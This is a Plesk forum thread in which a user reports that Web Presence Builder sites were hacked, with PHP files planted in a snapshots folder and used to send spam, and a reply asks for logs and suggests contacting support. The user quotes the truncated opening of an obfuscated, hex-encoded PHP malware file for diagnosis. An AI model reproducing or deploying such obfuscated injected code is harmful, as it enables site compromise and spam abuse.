• Plesk Uservoice will be deprecated by October. Moving forward, all product feature requests and improvement suggestions will be managed through our new platform Plesk Productboard.
    To continue sharing your ideas and feedback, please visit features.plesk.com

Issue Several Web Presence Builder sites hacked

AlexandreS

New Pleskian
Hello

I'm having problems with hackers, and it looks like they are targeting sites made with Web Presence Builder.
They are able to put some PHP files on the site's directory and then use it to send spam.

It looks like they can inject and execute PHP code in files like this:
......./httpdocs/data/snapshots/dd6520eaa764cf545f83e23869286126.php

This file's first lines are like this now:

----------------
<?php $gf1de = 190;$GLOBALS['ua2ed']=Array();global$ua2ed;$ua2ed=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['a9a65']="\x3b\x7e\x4e\x6e\x2c\x2f\x30\x46\x79\x4f\x21\x68\x78\x2b\x5a\x42\x59\xa\x6a\x63\x74\x34\x39\x7a\x32\x26\x52\x43\x61\x53\x3e\x33\x45\x76\x31\x60\x40\x22\x4a\x23\x65\x41\x49\x27\x6d\x71\x2a\x7b\x7d\x67\x72\x6c\x73\x3a\x50\x37\x6f\x25\x2e\x5e\x3c\x7c\x70\........
----------------

Right bellow this PHP code I can see the usual gibberish text that looks like an sqlite database.

What can be wrong? Anyone else is having this issue?

Thanks
Alexandre
 
Hello,

Thank you for the message!

To investigate this issue much more information may be needed. Especially logs related to the time of malicious file creation, versions of software installed.
Could you contact Plesk support?
 
Back
Top